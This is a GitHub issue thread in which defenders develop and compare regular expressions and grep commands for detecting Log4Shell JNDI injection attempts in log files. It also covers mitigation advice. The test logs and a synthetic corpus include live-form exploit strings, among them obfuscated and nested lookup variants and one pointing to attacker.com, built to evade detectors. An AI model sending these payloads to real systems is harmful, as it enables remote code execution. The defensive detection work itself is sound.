Doing just the same using a RegEx #5

Open
back2root opened this issue Dec 12, 2021 · 14 comments

Comments

@back2root

The following regex does the equivalent.
I'm not sure it still counts as a reasonable regular expression, but it's doable:

(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])

It matches the following strings case-insensitively, even if they are (partially) URL-encoded:

  • ${jndi:ldaps:
  • ${jndi:ldap:
  • ${jndi:rmi:
  • ${jndi:dns:

Improvement idea for the script:
To reduce the chance of false positives and improve performance a bit, you could require that the leading '$' is immediately followed by a '{'.
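
The way the pattern above is assembled can be sketched in Python: each literal character becomes an alternation of the character itself and its percent-encoded forms, and the pieces are joined with a bounded `.{0,30}` gap. This is only an illustration of the construction, not the author's own tooling; the names `enc`, `word`, `PROTOCOLS` and `JNDI_RE` are made up for this sketch.

```python
import re

GAP = ".{0,30}"  # bounded gap that tolerates inserted obfuscation

def enc(ch: str) -> str:
    """Alternation of a character and the %XX escapes of its lower/upper case."""
    escapes = sorted({f"%{ord(c):02X}" for c in (ch.lower(), ch.upper())})
    return "(?:" + "|".join([re.escape(ch)] + escapes) + ")"

def word(text: str) -> str:
    """Characters of `text`, each percent-encoding aware, separated by GAP."""
    return GAP.join(enc(c) for c in text)

# Protocols named in the post above; extend the list to cover more.
PROTOCOLS = ["ldaps", "ldap", "rmi", "dns"]

PATTERN = (
    enc("$") + enc("{") + GAP + word("jndi") + GAP + enc(":") + GAP
    + "(?:" + "|".join(word(p) for p in PROTOCOLS) + ")"
    + GAP + enc(":")
)

# IGNORECASE covers letter case and hex-digit case; ASCII keeps the
# case folding limited to ASCII letters.
JNDI_RE = re.compile(PATTERN, re.IGNORECASE | re.ASCII)

for sample in (
    "${jndi:ldap://tj5udg.dnslog.cn}",
    "$%7Bjndi:ldap://tj5udg.dnslog.cn%7D",
    "${jNdI:ldAp://tj5udg.dnslog.cn}",
):
    print(sample, bool(JNDI_RE.search(sample)))
```

Deriving the escapes from `ord()` also gives a way to cross-check hand-written ones: uppercase `R` and `S` encode as `%52` and `%53`, so classes such as `%[72]2` and `%[72]3` would cover `%22` and `%23` instead and may be worth a second look.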

@Neo23x0
Owner

Neo23x0 commented Dec 12, 2021

That's really nice. Let me see if I can verify the regex and add it to the gist in which we use grep.

https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

@Neo23x0
Owner

Neo23x0 commented Dec 12, 2021

I can't make it match on my log files with

sudo egrep -I -i -r '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])' /var/log

Maybe egrep is limited somehow, e.g. missing back-referencing.

Log line in one of the test files:

2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
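
One possible explanation, stated here as an assumption rather than a diagnosis: the pattern relies on Perl-style non-capturing groups `(?:...)`, which are not part of the POSIX extended syntax that egrep implements. A way to check the pattern itself, independent of grep, is to run it against the log line with an engine that understands that syntax. The sketch below uses Python's `re` module with the regex copied unchanged from the first post, split across lines only for readability.

```python
import re

# Pattern copied verbatim from the first post (adjacent raw strings are
# concatenated by Python into one pattern).
JNDI_RE = re.compile(
    r"(?:\$|%24)(?:{|%7[Bb])"
    r".{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee])"
    r".{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9)"
    r".{0,30}(?::|%3[Aa]).{0,30}"
    r"(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1)"
    r".{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?"
    r"|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)"
    r"|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3))"
    r".{0,30}(?::|%3[Aa])"
)

LOG_LINE = "2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}"

match = JNDI_RE.search(LOG_LINE)
print(match.group(0) if match else "no match")
```

GNU grep offers `-P` for Perl-compatible patterns, which may be worth trying here.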

@back2root
Author

Not yet tested with egrep or on the CLI in general.
As it should be valid PCRE, maybe a Perl one-liner can get us results.
Maybe I can craft something later.

@Neo23x0
Owner

Neo23x0 commented Dec 12, 2021

Sorry, I'm working on 5-7 other construction sites (YARA, Sigma, Python script, advisory for customers).
Thanks for your help.

@karanlyons

karanlyons commented Dec 12, 2021

Agreed that this is doable with a regex, but that’s also going to miss payloads (e.g. ${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}¹, ${jnd${upper:ı}:rm${upper:ı}://addr}). You probably just want something like https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6

¹ EDIT: Turns out the former won't work by default because base64 isn't actually in a release yet, just in master, but...imagine that someone added it as a custom lookup, or just consider any of the other available lookups.
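
Why a pattern keyed on literal letters can miss the second payload can be shown with a small sketch. The dotless `ı` (U+0131) is not an ASCII `i`, yet it upper-cases to a plain `I`, so after the lookup is evaluated the text can contain a letter that never appears in the raw input. The simplified `LITERAL_RE` below is a stand-in written for this example, not the regex from the first post, and Python's `str.upper()` is used only as an analogy for what the `upper` lookup does on the target.

```python
import re

# Simplified stand-in: "${", then j, n, d, i in order with bounded gaps.
# Explicit character classes are used instead of re.IGNORECASE, because
# Python's Unicode case-insensitive matching can also match "ı" for "i".
LITERAL_RE = re.compile(r"\$\{.{0,30}[jJ].{0,30}[nN].{0,30}[dD].{0,30}[iI]")

payload = "${jnd${upper:ı}:rm${upper:ı}://addr}"

print(LITERAL_RE.search(payload))  # the raw payload has no ASCII i or I
print("ı".upper())                 # upper-casing the dotless i
```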

@back2root
Author

Hi

I just managed to test the regex on the CLI.
The regex seems to work with grep -P against the test cases from this repo.

Current limitations:

  • Won't match on the pure Java exception: test-java-exception.log
  • Will only match a limited set of protocols, as stated in the first post

➜  test-cases git:(main) ls | grep -E "log$"
test-java-exception.log
test-log-heavy-obfusc.log
test-log-log4shell-casing.log
test-log-log4shell-obf1.log
test-log-log4shell.log
test-shouldnt-match1.log
test-shouldnt-match2.log
test-url-encoded.log
test-urldecode-shouldnt-match.log


➜  test-cases git:(main) grep -V | head -n 1
grep (GNU grep) 3.4


➜  test-cases git:(main) grep -r -P '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])'
test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}

Maybe I'll manage to work on a version covering the missing protocols: nis|iiop|corba|nds|http
If there's interest, I'm happy to share.

@Neo23x0
Owner

Neo23x0 commented Dec 13, 2021

Yes, please. We can replace the regex in this advisory with your version if it is able to cover the old strings and their obfuscated version.
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

I wouldn't replace it as long as it can't detect the other protocols.

@back2root
Author

Since the RegEx has become a bit more complicated, I created a script that generates the RegEx and put it in its own repo log4shell-rex to make it easier to extend later.

Feel free to use it or reference it in your gist.

➜  log4shell-rex git:(main) eval "$(./RegEx_Generator.sh)"
 _                _  _  ____  _          _ _       ____
| |    ___   __ _| || |/ ___|| |__   ___| | |     |  _ \ _____  __
| |   / _ \ / _` | || |\___ \| '_ \ / _ \ | |_____| |_) / _ \ \/ /
| |__| (_) | (_| |__   _|__) | | | |  __/ | |_____|  _ <  __/>  <
|_____\___/ \__, |  |_||____/|_| |_|\___|_|_|     |_| \_\___/_/\_\
            |___/

➜  log4shell-rex git:(main) grep -P ${Log4ShellRex} ../log4shell-detector/tests/test-cases/*.log
../log4shell-detector/tests/test-cases/test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
../log4shell-detector/tests/test-cases/test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
../log4shell-detector/tests/test-cases/test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %24%257Bjndi%3Aldap%3A%2F%2Ftj5udg%2Ednslog%2Ecn%257D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %2524%25257Bjndi%253Aldap%253A%252F%252Ftj5udg%252Ednslog%252Ecn%25257D
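
The last two lines above carry the same payload with additional layers of percent-encoding. An alternative to matching every encoding depth in the regex is to decode repeatedly until the text stops changing and then match the decoded line. This is a sketch of that idea, not a description of what `RegEx_Generator.sh` does; `fully_unquote` and `max_rounds` are names invented here.

```python
from urllib.parse import unquote

def fully_unquote(text: str, max_rounds: int = 5) -> str:
    """Percent-decode repeatedly until the text is stable or the cap is hit."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

line = "%2524%25257Bjndi%253Aldap%253A%252F%252Ftj5udg%252Ednslog%252Ecn%25257D"
print(fully_unquote(line))
```

The cap on rounds is there so that a hostile input cannot force an unbounded number of passes.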

@karanlyons

You might want to try against this synthetic corpus, which is also trying to model what sort of attacks might be coming (or that are already being missed):

\044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:addr}
%24%7Bjnd%24%7Bupper%3A%C4%B1%7D%3Aaddr%7D
${ jndi\t: addr\n
${ jndi\t: addr\n}
${${::-j}nd${upper:ı}:rm${upper:ı}://addr}
${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr}
${base64:d2hvIHRob3VnaHQgYW55IG9mIHRoaXMgd2FzIGEgZ29vZCBpZGVhPwo=}
${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr}
${jndi:${lower:l}${lower:d}a${lower:p}://addr
${jndi:dns://addr}
$%7B\u006a\\156di:addr\\x7d

You can see how my detections fare, and run your own examples against the test(string) and test_thorough(string) functions.

I don’t think there’s going to be one regex to rule them all because there’s a signal to noise trade off that needs to be considered. You’d ideally match on all of them and build a confidence score naïve Bayes style. But you want to encode as few assumptions into your detections as possible, otherwise you literally won’t know what you’re missing.
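
The idea of combining several detections into one confidence score can be sketched as follows. Each detector contributes a likelihood ratio depending on whether it fired, and the contributions are added in log-odds space under the naive assumption that detectors are independent. All rates and the prior are invented for illustration and would have to be estimated from real data; `DETECTORS`, `PRIOR` and `confidence` are hypothetical names.

```python
import math
import re

# name: (pattern, P(hit | malicious), P(hit | benign)); all rates are invented.
DETECTORS = {
    "SIMPLE": (re.compile(r"\$\{\s*jndi\s*:.*\}"), 0.60, 0.001),
    "NESTED": (re.compile(r"\$\{.*\$\{.*\}.*\}"), 0.50, 0.01),
    "ANY": (re.compile(r"\$\{.*\}"), 0.95, 0.10),
}
PRIOR = 0.01  # assumed share of malicious lines, also invented

def confidence(line: str) -> float:
    """Posterior probability that a line is malicious, naive Bayes style."""
    log_odds = math.log(PRIOR / (1 - PRIOR))
    for regex, p_mal, p_ben in DETECTORS.values():
        if regex.search(line):
            log_odds += math.log(p_mal / p_ben)
        else:
            log_odds += math.log((1 - p_mal) / (1 - p_ben))
    return 1 / (1 + math.exp(-log_odds))

for line in ("${jndi:ldap://addr}", "${${::-j}ndi:ldap://addr}", "plain log line"):
    print(f"{confidence(line):.3f}  {line}")
```

Because the detectors overlap heavily, the independence assumption overstates the evidence, so the output is better read as a ranking aid than as a calibrated probability.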

@back2root
Author

@karanlyons I'm wondering whether an exploit is possible without any protocol given and without a forward slash, e.g. ${ jndi\t: addr\n}

Not yet sure about the false positive rate.

@karanlyons

karanlyons commented Dec 14, 2021

https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup:

The JndiLookup allows variables to be retrieved via JNDI. By default the key will be prefixed with java:comp/env/, however if the key contains a ":" no prefix will be added.
By default the JDNI Lookup only supports the java, ldap, and ldaps protocols or no protocol. Additional protocols may be supported by specifying them on the log4j2.allowedJndiProtocols property.

https://docs.oracle.com/javase/jndi/tutorial/beyond/misc/policy.html:

In the comp context, there are two bindings: env and UserTransaction. The name env is bound to a subtree that is reserved for the component's environment-related bindings, as defined by its deployment descriptor. env is short for environment.

https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform/5/html/administration_and_configuration_guide/naming_on_jboss-j2ee_and_jndi___the_application_component_environment#ENC_Usage_Conventions-Environment_Entries:

Environment entries are a name-to-value binding that allows a component to externalize a value and refer to the value using a name.

So a contrived example would be, e.g., that there’s comp/env/pwd = "/" and you then use ${jndi:ldap${jndi:pwd}${jndi:pwd}addr} as your vector. I do not know whether this is practical anywhere or not, so I’d much rather have my detections tell me if someone else knows it’s practical rather than assume it isn’t and get popped.

Also keep in mind that jndi is not the only lookup, and you can plausibly make use of others to construct payloads depending on what is available on the target, including any custom lookups the target may have. There’s even a base64 lookup referenced in the User’s Guide and though I’m not sure I’ve seen it working in the wild¹ it would handily break most detections I’ve seen.

Have you tried testing the detections I’ve linked above? You can get an idea of their sensitivities by throwing a corpus of known vectors and a corpus of theorized probable vectors at them. The usage.md file shows some example vectors and which detections they trigger. I’d really recommend just using them, and weighting your prioritization for any hits based on the confusion matrix you’re seeing for them with the data in your environment.

But your best plan of action is just to upgrade or mitigate (rm JndiLookup.class or log4j2.formatMsgNoLookups=true) your log4j dependencies, and practice good defense in depth (e.g., block all unknown egress—including DNS if you can handle running your own resolver safely, jail everything on your machine). No detections on remote inputs are going to be able to find every attempt, it’s a cat&mouse game stacked heavily in the attacker’s favor.

¹ EDIT: Again, because base64 isn't actually in a release yet, just in master, but—also again—imagine that someone added it as a custom lookup, or just consider any of the other available lookups.
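
For the "rm JndiLookup.class" mitigation mentioned above, a quick check of whether a given jar still ships the class can be sketched like this. The class path is the one used by log4j-core; the function name `has_jndi_lookup` is invented here, and the sketch only inspects the top-level archive, so jars nested inside other archives would need extra handling.

```python
import zipfile

# Location of the lookup class inside log4j-core.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def has_jndi_lookup(jar_path: str) -> bool:
    """True if the archive still contains the JndiLookup class file."""
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP in jar.namelist()
```

A call such as `has_jndi_lookup("path/to/log4j-core.jar")` (a placeholder path) returns `True` for an archive that still contains the class.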

@back2root
Author

Thanks @karanlyons, I made some improvements to my regex and already get quite good coverage.
Maybe still not enough for use in an IPS, but a good starting point for SIEM detections.

@karanlyons

I’d still recommend that people use the collection of regexes I’ve put together as they’re free of assumptions. For example:

>>> import re
>>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]

>>> BACK2ROOT_RE = re.compile(r'[elided for comment]')
>>> BACK2ROOT_RE.search('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}') or False
False

>>> t('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

If you’re having trouble just getting the regexes for use elsewhere, this is very easy to do:

>>> from log4shell_regexes import regexes
>>> for n, r in regexes.items(): print (f'{n}: {r.pattern}')
SIMPLE_RE: \$\{\s*jndi\s*:.*\}
SIMPLE_WITH_ESCAPED_CONTENT_RE: \$\{.*(?:\\|%).*\}
NESTED_RE: \$\{.*\$\{.*\}.*\}
NESTED_INCLUDING_ESCAPES_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)
ANY_RE: \$\{.*\}
ANY_INCLUDING_ESCAPES_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)
SIMPLE_OPT_RCURLY_RE: \$\{\s*jndi\s*:.*\}?
SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE: \$\{.*(?:\\|%).*\}?
NESTED_OPT_RCURLY_RE: \$\{.*\$\{.*\}.*\}?
NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
ANY_OPT_RCURLY_RE: \$\{.*\}?
ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
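
The difference between a pattern and its `_OPT_RCURLY` variant in the listing above can be seen on a payload that is never closed, such as `${jndi:dns://addr`. The two patterns below are copied from the listing; the `hits` helper is a stand-in written for this example and is not the `test` function from `log4shell_regexes`.

```python
import re

# Patterns copied from the listing above.
PATTERNS = {
    "SIMPLE_RE": re.compile(r"\$\{\s*jndi\s*:.*\}"),
    "SIMPLE_OPT_RCURLY_RE": re.compile(r"\$\{\s*jndi\s*:.*\}?"),
}

def hits(line: str) -> list:
    """Names of the patterns that match somewhere in the line."""
    return [name for name, rx in PATTERNS.items() if rx.search(line)]

print(hits("${jndi:dns://addr}"))  # closed payload
print(hits("${jndi:dns://addr"))   # closing brace missing
```

Because the closing brace is optional, the second pattern effectively fires on any `${jndi:` prefix, trading more noise for fewer misses.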

@back2root
Author

Updated my regex
